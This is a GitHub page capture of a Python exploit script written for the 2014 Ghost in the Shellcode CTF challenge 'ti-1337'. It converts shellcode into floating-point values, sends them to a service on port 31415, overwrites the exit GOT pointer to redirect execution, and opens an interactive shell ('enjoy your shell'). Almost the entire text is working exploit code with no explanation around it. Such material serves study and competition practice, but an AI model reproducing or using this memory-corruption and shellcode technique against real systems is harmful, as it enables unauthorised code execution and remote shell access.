Permalink
Cannot retrieve contributors at this time
Join GitHub today
GitHub is home to over 31 million developers working together to host and review code, manage projects, and build software together.
Sign up
Fetching contributors…
Cannot retrieve contributors at this time
| from isis import * | |
| import math | |
| def pad_shellcode(s): | |
| properlen=math.ceil(len(s)/8.0)*8 | |
| padding='\0'*int(properlen-len(s)) | |
| return s+padding | |
| def chunk(it,a): | |
| for i in range(0,len(it),a): | |
| yield it[i:i+a] | |
| def float_shellcode(s): | |
| nums=[] | |
| for i in chunk(pad_shellcode(s),8): | |
| nums.append(unpack("d",i)[0]) | |
| return nums | |
| def shellcode_float(nums): | |
| s='' | |
| for i in nums: | |
| s+=pack('d',i) | |
| return s | |
| def write_exit_got(s): | |
| s.send('c\n') | |
| s.send('b\n'*2) | |
| s.send('+\n'*12) | |
| table=0x603150 | |
| after_exit=0x6030e8 | |
| EIP,=unpack('d',pack("q", table )) #overwrite exit got pointer | |
| s.send(str(EIP)+'\n') | |
| def crash(): | |
| s=get_socket(('localhost',31415)) | |
| #s=get_socket(('ti-1337.2014.ghostintheshellcode.com',31415)) | |
| #now start pushing shellcode as floats | |
| shellcode=file('./shellcode').read() | |
| nums=float_shellcode(shellcode) | |
| #break_point,=unpack('d',pack("Q",0xcccccccccccccccc)) | |
| #s.send(str(repr(break_point))+' \n') | |
| for i in nums: | |
| s.send(str(repr(i))+'\n') | |
| #s.send(str(break_point)+'\n') | |
| write_exit_got(s) | |
| #s.send('q\n') | |
| #quitting closes the socket | |
| #don't quit if you want socket reuse | |
| return s | |
| if __name__=='__main__': | |
| s=crash() | |
| print "wait for alarm" | |
| for i in range(30)[::-1]: | |
| time.sleep(1) | |
| print i | |
| s.recv(0x1000) | |
| MAGIC=pack("I",0xcafef00d) | |
| s.send(MAGIC) | |
| print "enjoy your shell" | |
| shell(s) |